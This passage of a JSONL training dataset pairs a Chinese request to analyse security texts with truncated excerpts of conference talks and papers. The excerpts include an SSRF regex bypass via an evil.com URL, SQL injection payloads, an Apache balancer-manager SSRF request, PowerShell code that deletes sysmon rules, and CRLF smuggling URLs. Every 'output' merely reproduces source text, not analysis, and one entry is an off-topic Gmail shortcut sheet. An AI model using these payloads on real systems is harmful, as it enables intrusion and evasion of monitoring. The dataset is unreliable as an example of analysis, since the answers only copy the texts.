flawed. We can bypass it by providing a prefix URL and appending the YouTube URL as a query string, as long as we encode the periods for the prefix URL as `%2E`. ```javascript >>> E = /https?:\\/\\/[.]+\\.youtube\\.com\\/embed\\//i; /https?:\\/\\/[.]+\\.youtube\\.com\\/embed\\//i >>> 'https://www.youtube.com/embed/'.match(E) Array [ \"https://www.youtube.com/embed/\" ] >>> 'https://www.evil.com?www.youtube.com/embed/'.match(E) null >>> 'https://www%2Eevil%2Ecom?www.youtube.com/embed/'.match(E) Array [ \"https://www%2Eevil%2Ecom?www.youtube.com/embed/\" ] ``` Let's try sending a RequestBin and see if Jeff visits it: ``` https://en", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEvery Breath You Take ::data gathering, persistence, and what it all means:: jim.oleary|dc0f WARNING: STATIC CONTENT One of the overriding themes of this talk is that once a piece of data has been captured, its forever retrievable. In the spirit of that principle, these made-for-CD slides have been watered down a little bit, in order to prevent any unintentional long-lived copyright violations, overly offensive topics or other goof ups . Dynamic, up-to-date slides can be pulled from: http://dl.jimio.com/dc0f/ebyt.pdf Abstract  How much data do you generate in the process of living an ordinary day? This talk covers various ways to gather, persist and analyze the data stream that is your life. Well cover a few of the approaches that are available today, some easy code you can whip up to persist anything you please, and what to expect from the community and businesses moving forward. Privacy/security impact is sure to be huge, so hold on to your hats, and start tracking and logging everything! Somebody else may be doing it for you already.. TODO: Data *  Definition  Gathering  Who, What, Where, When, Why, How?  Persistence  Who, What, Where, When, Why, How?  Mirroring  Analysis  Forecasting / Targeting Allow myself..  Jim OLeary, aka jimio  In the security game since about 2000  CompSci & Psych background  Mostly whitehat / corporate stiff  Enjoys: design, coding, breaking code, long walks  Contents of this talk do not reflect the views of my employer, friends, countrymen, etc. Data: Definition STUFF Data: Classification Data: Awareness  Information is your friend!  Knowledge is power!  The Vegas Hustle  Try to find a clock anywhere near a game table  Abstract tokenization of your cold, hard cash  Endless free drinks to modify perception  Chummy pit bosses, scantily-clad waitresses  Overwhelm and distract, only to take your money Data: Gathering Acquisition Methods / Data Types Push email Pull RSS Voluntary Twitter Involuntary ISP snooping Manual Pen and paper Self-reg", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTowards an Approach for Automatically Repairing Compromised Network Systems Julian B. Grizzard, Sven Krasser, Henry L. Owen School of Electrical and Computer Engineering Georgia Institute of Technology Atlanta, Georgia 303320250, USA {grizzard, sven, owen}@ece.gatech.edu Gregory J. Conti, Eric R. Dodson College of Computing Georgia Institute of Technology Atlanta, Georgia 30332-0280, USA {conti, edodson}@cc.gatech.edu Abstract The widely accepted method to repair a compromised sys- tem is to wipe the system clean and reinstall. We think that there may be alternative methods. Specifically, we envision systems that are capable of automatically recovering from system compromises. Our proposed approach is a repair agent that resides in an isolated area on the system. We use a virtual machine approach to isolate the repair agent. The repair agent should roll back any undesirable changes, de- termine the point of entry, and prevent further compromise. 1. Introduction Conventional wisdom states that once a system has been compromised, it can no longer be trusted. An attacker that has compromised a system can modify any state within the system, and so it is difficult to determine the extent to which the attacker has modified the system. Further conventional wisdom states that the only option to re-establish trust in a compromised system is to completely reinstall the operat- ing system from known good media. We propose that systems can be built in such a way that they automatically repair themselves after a system com- promise has occurred. We call systems that are capable of automatically repairing themselves self-healing systems. The entire mechanism that is responsible for repairing the system is called the repair agent. In addition to repairing the system, the repair agent must re-establish trust in the compromised system such that the user can again trust the system. Re-establishing trust in a compromised system is a dif- ficult problem. One important reason for this is be", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInformation Classification: General Scaling the Security Researcher to Eliminate OSS Vulnerabilities Once and for All - Jonathan Leitschuh - - Patrick Way - Information Classification: General - Jonathan Leitschuh - Software Engineer & Security Researcher Dan Kaminsky Fellowship @ HUMAN Security GitHub Star & GitHub Security Ambassador Twitter: @JLLeitschuh GitHub: JLLeitschuh  Hello! Information Classification: General - Patrick Way - Senior Software Engineer OpenRewrite Team @ Moderne Twitter: @WayPatrick GitHub: pway99 Hello! Information Classification: General Disclaimer Information Classification: General Supported by The Dan Kaminsky Fellowship at HUMAN Security Information Classification: General Chester Higgins/The New York Times Information Classification: General It Started With a Simple Vulnerability Information Classification: General HTTP Download of Dependencies in the Java Ecosystem // build.gradle maven { setUrl(\"http://dl.bintray.com/kotlin/ktor\") } Information Classification: General Why is HTTPS important? 9 Information Classification: General HTTP Download of Dependencies in the Java Ecosystem <!-- Compiler & Test Dependencies --> <repositories> <repository> <id>example-id</id> <name>Example insecure repository</name> <url>http://[SOME URL HERE]</url> </repository> </repositories> Information Classification: General HTTP Download of Dependencies in the Java Ecosystem <!-- Artifact upload - Credentials!! --> <distributionManagement> <repository> <id>example-id</id> <name>Example insecure repository</name> <url>http://[SOME URL HERE]</url> </repository> </distributionManagement> Information Classification: General This Vulnerability was Everywhere! Information Classification: General 13 Information Classification: General Who else was vulnerable? Information Classification: General 25% of Sonatype Maven Central downloads are still using HTTP - Sonatype June 2019 - Information Classification: General How do we fix this? Information Classification: G", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Completion Backwards Principle Bringing Layer 0 Issues To Layer 3  geoffrey  Defcon 0x0F Alarm Systems  Fire  Actively detects a fire  Alerts inhabitants, and /or authorities  Burglar  Detects intrusion into the facility premises  Alerts inhabitants, and /or authorities  Often co-exists with a Fire alarm system Anatomy of a Burglar Alarm  Basic Topology  Panel  Sensors  Motion  Glass Break  Door Triggers  Smoke/Fire  Monitoring Method  What good is an unwatched alarm system? (D)Evolution of Monitoring  Leased Lines  Dedicated & Expensive  POTS Lines  Common in all buildings & Cheap  Cellular/RF  Cheaper & Subject to outages  Internet  Lowest cost  Subject to whims of your ISP/Script Kiddies Internet Monitoring Hardware  DMP  ICOM/ICOM-E  Honeywell  AlarmNet-i(7845i) DMP ICOM-E  Choose udp or tcp  Default protocol is udp  Port is Configurable  Default value is 2001  AES is only available algorithm  128 bit  POTS Dialer if no Central Station contact Honeywell AlarmNet-i  Only uses tcp  Port 54109  Choice of encryption algorithm  256 bit AES (UL Certified)  Blowfish* (Factory Default)  POTS Dialer if no Central Station contact  No open ports; ether identifies as Ademco IP Reporting Characteristics  DMP  Uses port 2001  Port is configurable  Defaults to udp  Reports to CSC-1R  AlarmNet-i  Uses port 54109  Port is not a configurable option  Only uses tcp for network traffic  Reports to AlarmNet 7810iR AlarmNet-i Traffic  AlarmNet-i => 7810iR TCP [SYN] Seq=0 Len=0 MSS=1460  7810iR => AlarmNet-i TCP [SYN, ACK] Seq=0 Ack=1 Win=5840 Len=0 MSS=1380  AlarmNet-i => 7810iR TCP [ACK] Seq=1 Ack=1 Win=5840 Len=0  AlarmNet-i => 7810iR TCP [PSH, ACK] Seq=1 Ack=1 Win=5840 Len=68  7810iR => AlarmNet-i TCP [PSH, ACK] Seq=1 Ack=69 Win=5772 Len=52  AlarmNet-i => 7810iR TCP [RST, ACK] Seq=69 Ack=53 Win=5788 Len=0   AlarmNet-i => 7810iR TCP [SYN] Seq=0 Len=0 MSS=1460  7810iR => AlarmNet-i TCP [SYN, ACK] Seq=0 Ack=1 Win=5840 Len=0 MSS=1380  AlarmNet-i => 7810iR TCP [ACK] Seq=1 Ack=1 Win=", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAaron Bayles DC101 @ DEF CON 22 19 years in IT/Infosec Worked in Oil & Gas (O&G) last 8 years Along the way Penetration testing Vulnerability assessment Network architecture, design & implementation Risk assessment Legacy equipment/comms Remote (geographic) connectivity Long lifecycle Power/space is a premium Life safety can be dependent The demands placed on Industrial Control Systems (ICS) & SCADA networks dont match up with security requirements Understand your network & data flows Does not require expert knowledge Start with the basics Some concepts for enterprise IT can be used, with modification Build relationships between enterprise IT and industrial IT Network segmentation Portable media control Configuration management Disaster recovery (DR) planning Workforce development/training Although these may be similar, significant differences exist Formally the Purdue Enterprise Reference Architecture (PERA) Widely accepted within ICS industry Compatible with multiple standards, ISA95, ISA99, and IEC 62443 Works with zone & conduit concepts Represented by Layers 0/1-5 Starting point for ICS network segregation Traffic within same zone is allowed Traffic passing between zones via conduits are controlled Layer 2 (L2) can SET/CHANGE values on L1 L3 can only READ values from L2 & L1 Control points also allow for reporting ICS applications often misbehave OPC (Object Linking and Embedding for Process Control) uses MS DCOM They dont always communicate statefully Protocols have been subverted MODBUS DNP3 Some vendors have started to adapt to ICS Tofino (C1D2, DIN rail mount) Palo Alto (Rack mount only for now) Do not install in blocking mode without extensive testing & tuning USB & removable media control Anti-virus/anti-malware Application whitelisting Patch management for EWS & servers Corporate IT has these systems, BUT ICS cannot patch as frequently Application & OS security models differ Dependent on directory services (AD) Build your own! Like enterprise IT, ICS req", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmod_proxy_balancermanager 0x00 mod_proxybalanceapache proxy balancer apachebalancermanagerbalancerworker <Location \"/balancer-manager\"> SetHandler balancer-manager Require host example.com </Location> hostexample.commanagerrequire balancerworkerworkerbalancer 0x01 manageworker managerssrf registerhookap_hook_handler balancer_handler handler balancer_process_balancer_workerbalancerworker url params 1309define_workerworker url workerworker OK b_wyes1b_nwrkrurlget workerdefine workernum_free_slots0 POST /balancer-manager HTTP/1.1 Host: 192.168.50.220:5000 Proxy-Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Sa fari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application /signed-exchange;v=b3;q=0.9 Referer: http://192.168.50.220:5000/balancer-manager?b=mycluster&nonce=ec5268de-fb1b-30ab-a372-a0ea90ea4603 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Content-Length: 117 b=mycluster&w=http://127.0.0.1:9000&nonce=fa5dcdc1-ccf1-d0b6-712c-dc08351f3b6a&b_wyes=1&b_nwrkr=http://127.0.0.1:700 0 num_free_slots0http://127.0.0.1:7000 num_free_slots0 max members3freeadd new workerworker worker 0x02", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n手機鑑識技術及實務分享 鑒真數位有限公司 黃敬博 (po@iforensics.com.tw) 時間:2011/07/23 Page  2 Agenda Trend of Mobile Forensics Smart Phone Forensics Focus Commercial Solutions Q & A Page  3 Mobile Phone Subscribers Page  4 Computers versus Mobiles Mobiles are supplanting traditional computing  it is now predicted by the end of 2011, that sales of smart-phones alone will have passed that of computing devices Page  5 Spot the difference? Page  6 Mobile Devices Forensics Scope Watch Phone Sim Card Phone / Smartphone Memory Stick / SD Card GPS Mobile Modem Media Device Tablet Page  7 Mobile Forensics Key Factors 2011 April 基礎手機鑑識 SIM Handset Memory Card SIM Memor y Card Handse t SIM-ID Cloner Device Memory Card Reader The Best Easy Forensics Tools: 1. FTK Image Light 2. Forensics Card Reader 3. SIM Card Reader Page  9 What evidence can we expect in a mobile today?  Contacts  Calls (dialled, missed, received)  Text Messages (SMS) & Multimedia (MMS)  Times / Dates  Pictures, Audio and Video Images  Tasks / Notes / Calendars  Application Files  Bluetooth Pairing  Maps, GPS Locations  E-mail, browser History  Smartphone App Data  Facebook, Skype, Gmail etc Page  11 Evolution of data storage and Forensics focus Sim Phone Memory Card Apps The Cloud Page  12 Mobile Device Market Trend  December 2010 Page  13 Smartphone Market Share Page  14 Complicated Forensics focus in APPs 3rd party Apps... What doesnt it do? Accounts  E-mail, ICQ Free, AOL Instant Messenger Bookmarks  Web browser, Google Maps Dynamic Keyboard Cache History  Web browser, Google Maps, YouTube, Google Earth IP-telephony  Skype, Viber Messaging  Skype, Viber, WhatsApp, Yahoo Messenger, AOL Instant Messenger Navigation Data  TomTom Social Engineering  Facebook  Twitter 14 Gmail Calendar Talk YouTube Contact Search Maps Android ( Google APP World) Page  16 Mobile Forensics Approach ZRT Project A Phone XRY or UFED Logical /Paraben/Oxygen/Mobile Edit/Data Pilot XRY / UFED Physical Salavation Flash Reader/ PC3000 Flash SSD Research Purpos", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAylin Caliskan @aylin_cim Assistant Professor George Washington University Rachel Greenstadt @ragreens Associate Professor Drexel University De-anonymizing Programmers from Source Code and Binaries August 10, 2018 1 Stylometry Natural language English English as a second language Translated text Underground forum text Artificial language Programming languages Python C/C++ Source code Binary executables August 10, 2018 2 Stylometry Natural language FBI Expert witnesses European high-tech crime units Artificial language Expert witnesses DARPA US Army Research Laboratory August 10, 2018 3 August 10, 2018 Why de-anonymize programmers? 4 Iran confirms death sentence for 'porn site' web programmer. No technical difference between security-enhancing and privacy-infringing Source code stylometry August 10, 2018 5 Source code stylometry Application Learner Setting Software forensics Multiclass Open world Stylometric plagiarism detection Multiclass Closed world Copyright investigation Two-class Closed world Authorship verification Two-class/One-class One-class open world A machine learning classification task August 10, 2018 6 Random Forest Classifier A B C D De-anonymizing Programmers Fuzzy Parsing Identifying Programmer Fingerprints Language Processing Supervised Machine Learning Privacy and Security Implications Source Code August 10, 2018 7 De-anonymizing programmers Application Classes Instances Accuracy Stylometric plagiarism detection 250 class 2,250 98% Large scale de-anonymization 1,600 class 14,400 94% Copyright investigation Two-class 540 100% Authorship verification Two-class/One-class 2,240 91% Open world problem Multi-class 420 96% Principled method & robust syntactic feature set August 10, 2018 8 Source code stylometry preprocessing extract features majority vote A B C D random forest fuzzy AST parser 1,600 contestants  C++ De-anonymized Programmers August 10, 2018 9 Features Source code Abstract syntax tree August 10, 2018 10 Case 1: Authorship attribution Who", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBBQSQL Ben Toews Scott Behrens Who are we?  Ben Toews  Security Consultant / Researcher at Neohapsis  Scott Behrens  Security Consultant / Researcher at Neohapsis Why are we here?  BBQSQL  New dog, old trick  Exploits Blind SQL Injection  New dog, new trick  Fast  Easy  Gets those hard to reach spots SQL What?  Structured Query Language (SQL)  Language for interacting with database  SQL Injection  Inject syntax into an application's SQL queries Basic SQL Injection Normal Case: UNAME = \"mastahyeti\" PASS = \"s3cret\" QUERY = \"select * from users where pass=md5 ('\"+PASS+\"') and uname='\"+UNAME+\"'\"; QUERY evaluates to: select * from users where pass=md5('secret') and uname='mastahyeti' Basic SQL Injection SQL Injection Case: UNAME = \"pwned' or '1'='1\"; PASS = \"pwned\"; QUERY = \"select * from users where pass=md5 ('\"+PASS+\"') and uname='\"+UNAME+\"'\"; QUERY evaluates to: select * from users where pass=md5('pwned') and uname='pwned' or '1'='1' Blind SQL Injection  Still trying to alter SQL syntax  Dumping database  More complex SQL syntax Blind SQL Injection Blind SQL Injection Case: UNAME = \"' or (ASCII(SUBSTR(SELECT user(), 1,1))>63) --\"; PASS = \"\"; QUERY = \"select * from users where pass=md5 ('\"+PASS+\"') and uname='\"+UNAME+\"'\"; QUERY evaluates to: select * from users where pass=md5('') and uname='' or (ASCII(SUBSTR(SELECT user(), 1,1))>63) --' Blind SQL Injection select * from users where pass=md5('') and uname='' or ( ASCII( << char -> int SUBSTR( << slice string SELECT user() << current user ,1,1) << first char )>63 << 63 = '?' ) --' << comment Blind SQL Injection  Binary (or other) search for each character  One character at a time  Time consuming Blind SQL Injection  Lots of excellent tools out there  sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ...  Lots of great features  good job guys...  If these tools don't work  You end up writing a custom script, test, debug, test, debug...  What if there was a way to simplify tricky Blind SQL Injection attacks... BBQSQL:Use do", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n构建安全监控平台 lion_00 CCIE 2011年11月 CISSP 2013年4月 安全爱好者 关于我: 安全监控应该怎么做 开源/商业 大量的告警有人看吗 怎么才可以让告警准确一些 监控的范围以及层次 以核心资源为中心进行保护 尽量将所有边界囊括其中 一 网络层 数据源:出口流量镜像 IDS:suricata 简单展示界面:BASE 报表展示SNORBY 网络IDS 起到了眼睛的作用绝大多数攻击 可以通过编辑网络IDS的规则便可以发现比如SQLMAP AWVS等等 二 日志的存储与展示 数据源:出口流量镜像 将外部访问的HTTP/HTTPS数据从网络流量中提取出来以便后续使用 三 访问日志(HTTP/HTTPS)&WEB 服务器日志 数据源:出口流量镜像 工具:E.L.K 四 主机层 数据源:主机IDS-OSSEC 展示界面 文件变更 端口变化 SYSLOG告警 五 网络边界 NMAP / 域名变更通知 对外端口开放情况 对外域名开放情况 六 审计设备 数据库审计 BASH 审计  有了以上这些是否就已经足够了 工具开发 策略优化 告警调整 性能调整 工具开发 策略优化 了解常见的黑客软件的签名 了解安全工具的相关特性 SURICATA ossec 日志分析 扫描报告 变更报告 堡垒机日 志 关联分析 告警调整 核心思想: 站在黑客的角度思考设计 建立规则分析引擎对事件进行关联分析 提高告警的准确度 例如:SURICATA 产生了发现菜刀的告警 同时OSSEC 产生文件变更告警 3次SSH 登录失败与30次SSH 登录失败 SURICATA 发现SQL告警同时日志分析处发现CODE 为200 交叉关联:事件与目标漏洞直接的关联 逻辑关联:事件之间的关联 检测内容  IP访问频率  URL访问频率 检测恶意行为  扫描/爬虫  暴力登录  平行权限 关于E.L.K SURICATA WEB日志 OSSEC 关联分析 告警 事件概率 离线分析 告警 SURICATA WEB日志 OSSEC Elasticsearch 离线分析 格式化 采用的关键技术", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Crashing Your Way to Medium-IL: Exploiting the PDB Parser for Privilege Escalation Gal De Leon (@galdeleon) Palo Alto Networks Who am I?  Gal De Leon (@galdeleon)  Principal security researcher at Palo Alto Networks  Interested in fuzzing, vulnerabilities, exploits and mitigations  Microsoft MSRC MVSR 2018, 2019, 2020  ~40 vulnerabilities 2 Agenda  What are PDBs?  Finding vulnerabilities in PDB parser  Attack surfaces  Exploit & Demo 3  Store debugging info (symbols) about an executable  Function names, globals, type info   Created from source files during build  Used by debuggers What are PDB Files? 4 0:007> .reload /f notepad.exe 0:007> x notepad!* 00007ff7`9b4c4520 notepad!__scrt_uninitialize_thread_safe_statics (void) 00007ff7`9b4a86b0 notepad!ShowOpenSaveDialog (void) 00007ff7`9b4c09e8 notepad!StringLengthWorkerW (void) 00007ff7`9b4c38e0 notepad!initialize_printf_standard_rounding (void) 00007ff7`9b4a1640 notepad!`dynamic initializer for 'szFileName'' (void) ... The PDB File Format  Proprietary file format by Microsoft  Binary  Multi Stream Format (MSF)  Open sourced for non-MS compilers to produce PDBs  Parser implemented in Dbghelp.dll  Shipped by default  API to debug a process, load PDBs, extract symbols data ... 5 Lets Fuzz PDB 6 Fuzzing Setup 7  Corpus - ~5000 PDBs from several sources  Test Harness - A program that loads a PDB file and parse it  Dbghelp!SymLoadModule  WinAFL fuzzer Corpus Mutator Run Harness Crashes Start Repeat 8 What is the Attack Surface?  Remote symbols servers  Attacker controls / MitM symbols server can serve arbitrary PDBs 9 0:007> .sympath srv*http://msdl.microsoft.com/download/symbols Symbol search path is: srv*http://msdl.microsoft.com/download/symbols Expanded Symbol search path is: srv*http://msdl.microsoft.com/download/symbols 0:007> .reload /f notepad.exe Victim Debugger Symbol Server Attacker (MitM) Report to Microsoft MSRC  18-08-2020 - Initial report to Microsoft MSRC  15-09-2020 - Doesnt meet the bar", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1562-001-windows-绕过sysmon ## 来自ATT&CK的描述 攻击者可能试图阻止由监测软件或进程捕获到的告警以及事件日志被收集和分析这可能包括修改配置文件或注册表项中的监测软件的设置以达到逃避追踪的目的 在基于特征监测的情况下攻击者可以阻止监测特征相关的数据被发送出去以便于阻止安全人员进行分析这可以有很多方式实现例如停止负责转发的进程splunk转发器Filebatersyslog等 ## 测试案例 众所周知sysmon可以帮助安全人员记录很多安全事件目前sysmon最新版本已经是10.X版本对于攻击者来讲他们可能需要确定目标主机是否存在sysmon通常攻击者是不会去检测他们入侵的主机上是否存在sysmon 如何检测被入侵的主机是否存在sysmon很多攻击者一般执行以下的一种操作 枚举进程 枚举服务 枚举C:\\Windows\\System32\\Drivers下的驱动 但是你应该知道sysmon可以实现以下功能用户可以在其中更改可执行文件和驱动文件的名称以便其在系统中的存在进行模糊处理 不过攻击者可以利用fltmc.exe查看其altitude号码sysmon的altitude号码是385201固定不变的 使用fltmc.exe得到的altitude号 ```dos Windows PowerShell 版权所有 (C) 2009 Microsoft Corporation保留所有权利 PS C:\\Users\\Administrator> fltmc.exe 筛选器名称 数字实例 高度 框架 ------ SysmonDrv 2 385201 0 luafv 1 135000 0 ``` 在Mimikatz中使用misc::mflt命令得到的altitude号 ```dos mimikatz # misc::mflt 0 2 385201 SysmonDrv 0 1 135000 luafv ``` 关于更多的如何检测被入侵的主机是否存在sysmon你可以参考<https://anquan.baidu.com/article/350如何检测sysmon不是本文的重点.> ### **绕过Sysmon的两种方法** 目前攻击者有2个绕过sysmon的方法第一个是在利用sysmon进程中的盲点第二种则是直接禁用sysmon #### 删除配置项 攻击者可以删除注册表中的规则项此时 Sysmon在发现注册表被更改后它将自动重新加载配置由于此时没有任何安全检测规则存在它将暂时失去防护能力不过失效时间取决于配置的维护方式如果配置由AnsibleChef或DSC等配置管理系统管理可能需要几秒到几分钟才能将配置更改回原始状态如果使用GPO来管理那么当GPO更新时可以在90分钟内恢复原始状态为了解决这个问题攻击者可以使用各种Windows技术如.NetVBSPE文件等创建VMI临时性Consumer监控相应的注册表项当发现修改操作时则会删除修改数据或者重新设置表项内容之所以使用临时的Consumer是因为大多数防护解决方案会重点关注正在创建或修改的WMI永久事件 #### 卸载SysmonDrv驱动 我们可以采取的另一个操作就是卸载SysmonDrv驱动该驱动可以为Sysmon提供关于所有磁盘操作的信息然后将信息写入事件日志中如前文所述该驱动有个唯一的altitude编号如果我们以管理员权限运行就可以卸载该驱动然后Sysmon基本上就会完全处于失效状态我们可以使用`fltmc.exe`工具来卸载驱动如下所示我们通过altitudde编号识别出了隐藏驱动并成功卸载该驱动 #### 关闭sysmon服务管理员权限 通过windows任务管理器管理员权限关闭sysmon服务 ## 检测日志 sysmon日志Windows-WMI-Activity日志system日志 ## 测试复现 ### 删除配置项1 ```dos $query = \"SELECT * FROM RegistryKeyChangeEvent \" + \"WHERE Hive ='HKEY_LOCAL_MACHINE' \" + \"AND KeyPath ='SYSTEM\\\\CurrentControlSet\\\\Services\\\\SysmonDrv\\\\Parameters'\" Register-WMIEvent -Query $query -Action { Write-host \"Sysmon config updated, deleting config.\" Remove-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\SysmonDrv\\Parameters\" -Name \"Rule", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 NetRipper Smart traffic sniffing for penetration testers Ionut Popescu KPMG Bucharest, Romania ionut.popescu@outlook.com April 2015 Abstract  The post-exploitation activities in a penetration test can be challenging if the tester has low- privileges on a fully patched, well configured Windows machine. This work presents a technique for helping the tester to find useful information by sniffing network traffic of the applications on the compromised machine, despite his low-privileged rights. Furthermore, the encrypted traffic is also captured before being sent to the encryption layer, thus all traffic (clear-text and encrypted) can be sniffed. The implementation of this technique is a tool called NetRipper which uses API hooking to do the actions mentioned above and which has been especially designed to be used in penetration tests. I. INTRODUCTION AND PROBLEM DESCRIPTION The following situation occurs pretty often in an internal penetration test: the tester gains low privileged access to a Windows machine (workstation or server) where he is able to execute arbitrary code. However, he has difficulty in escalating his privileges or pivoting to other machines because no obvious vulnerabilities can be found on that machine. The situation is frustrating as there are open network connections from the victim machine to other machines on the network, which may contain useful information for escalating privileges or for pivoting to other machines. However, the traffic cannot be easily intercepted because the lack of privileges. Furthermore, there may be also a user on that machine which is browsing the web or accessing internal services and his credentials would be useful for advancing the penetration test. So the problem is how to intercept the network traffic while having low privileges on a Windows machine? II. THE SOLUTION We have developed NetRipper, which is a standalone application (and Metasploit module) that is able to capture network traffic sent and received by a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYOUR VOICE IS MY PASSPORT John Seymour and Azeem Aqil 1 Introduction Voice is starting to be used for authentication 2 Introduction Voice is starting to be used for authentication 3 Introduction Voice is starting to be used for authentication 4 Introduction Voice is starting to be used for authentication 5 Goal: Break Voice Authentication (with minimal effort) 6 Obligatory Sneakers Reference 7 Obligatory Sneakers Reference And heres how you do it. 8  In Sneakers, they social engineered the target in order to record the exact words they needed  In practice, this is hard to do  Luckily, text-to-speech exists 9 10 Overview of Text to Speech (TTS) Essential idea: you give the algorithm text, and it generates the equivalent audio representation of that text (e.g. Mel Spectrograms) Model learns the mapping between the transcript and audio The way it does this is you give it labeled (transcribed) audio and feed it into a deep neural network  Generally models are trained on a single persons voice  Generally deep learning models require a LARGE amount of labeled data  Open source datasets (e.g. Blizzard, LJ Speech)  >24 hours of labeled data to do well 11 Proof of concept  Create an account  Record >30 sentences  Chosen by Lyrebird, same for all users.  Provide a target sentence that Lyrebird will generate.  Apple Siri and Microsoft Speaker Recognition API (Public Beta)  Proof of concept is of limited value from a security standpoint 12 Proof of Concept Demo 13 Open source TTS models Several open source models (Tacotron, Wavenet are best known)  WaveNet generates realistic human sounding output, however, needs to be tuned significantly. Tacotron simplifies this process greatly  The production of the feature set (which needs tuning in WaveNet) is replaced by another NN that works directly off data We use Tacotron 14 Model overview 15 Tacotron v1, Tacotron v2, and WaveNet 16 Collecting Data Thats all well and good, but in order to train a model, we need to feed it data  Can gr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Gmail date: 2022-11-23 16:23:31.699967 background: bg-[#d8503f] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 90 keyboard shortcuts found on Gmail --- Keyboard Shortcuts ------------------ ### Compose and Chat Shortcut | Action ---|--- `P` | Previous message in an open conversation `N` | Next message in an open conversation `Shift` `Esc` | Focus main window `Esc` | Focus latest chat or compose `Ctrl` `.` | Advance to the next chat or compose `Ctrl` `,` | Advance to the previous chat or compose `Ctrl` `Enter` | Send `Ctrl` `Shift` `C` | Add cc recipients `Ctrl` `Shift` `B` | Add bcc recipients `Ctrl` `Shift` `F` | Access custom from `Ctrl` `K` | Insert a link `Cmd` `;` | Go to next misspelled word (Mac only) `Ctrl` `M` | Open spelling suggestions {.shortcuts} ### Formatting Text Shortcut | Action ---|--- `Ctrl` `Shift` `5` | Previous font `Ctrl` `Shift` `6` | Next font `Ctrl` `Shift` `-` | Decrease font size `Ctrl` `Shift` `+` | Increase font size `Ctrl` `B` | Bold `Ctrl` `I` | Italics `Ctrl` `U` | Underline `Ctrl` `Shift` `7` | Numbered list `Ctrl` `Shift` `8` | Bulleted list `Ctrl` `Shift` `9` | Quote `Ctrl` `[` | Indent less `Ctrl` `]` | Indent more `Ctrl` `Shift` `L` | Align left `Ctrl` `Shift` `E` | Align center `Ctrl` `Shift` `R` | Align right `Ctrl` `\\` | Remove formatting {.shortcuts} ### Actions {.row-span-2} Shortcut | Action ---|--- `,` | Move focus to toolbar `X` | Select conversation `S` | Toggle star or rotate among superstars `E` | Archive `M` | Mute conversation `Shift` `1` | Report as spam `Shift` `3` | Delete `R` | Reply `Shift` `R` | Reply in a new window `A` | Reply all `Shift` `A` | Reply all in a new window `F` | Forward `Shift` `F` | Forward in a new window `Shift` `N` | Update conversation `]/[` | Archive conversation and go to previous or next `Z` | Undo last action `Shift` `I` | Mark as read `Shift` `U` | Mark as unread `Shift` `-` | Mark unread from the selected message `=` | Mark as impo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! Orange Tsai Taiwan No.1 About Orange Tsai The most professional red team in Taiwan About Orange Tsai The largest hacker conference in Taiwan founded by chrO.ot About Orange Tsai Speaker - Speaker at several security conferences Black Hat USA, DEFCON, HITCON, WooYun, AVTokyo CTFer - CTFs we won champions / in finalists (as team HITCON) DEFCON, Codegate, Boston Key Party, HITB, Seccon, 0CTF, WCTF Bounty Hunter - Vendors I have found Remote Code Execution Facebook, GitHub, Uber, Apple, Yahoo, Imgur About Orange Tsai Agenda Introduction Make SSRF great again Issues that lead to SSRF-Bypass Issues that lead to protocol smuggling Case studies and Demos Mitigations What is SSRF? Server Side Request Forgery Bypass Firewall, Touch Intranet Compromise Internal services Struts2 Redis Elastic Protocol Smuggling in SSRF Make SSRF more powerful Protocols that are suitable to smuggle HTTP based protocol Elastic, CouchDB, Mongodb, Docker Text-based protocol FTP, SMTP, Redis, Memcached Quick Fun Example http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ urllib2 httplib requests urllib Quick Fun Example Python is so Hard Quick Fun Example CR-LF Injection on HTTP protocol Smuggling SMTP protocol over HTTP protocol http://127.0.0.1:25/%0D%0AHELO orange.tw%0D%0AMAIL FROM >> GET / << 421 4.7.0 ubuntu Rejecting open proxy localhost [127.0.0.1] >> HELO orange.tw Connection closed SMTP Hates 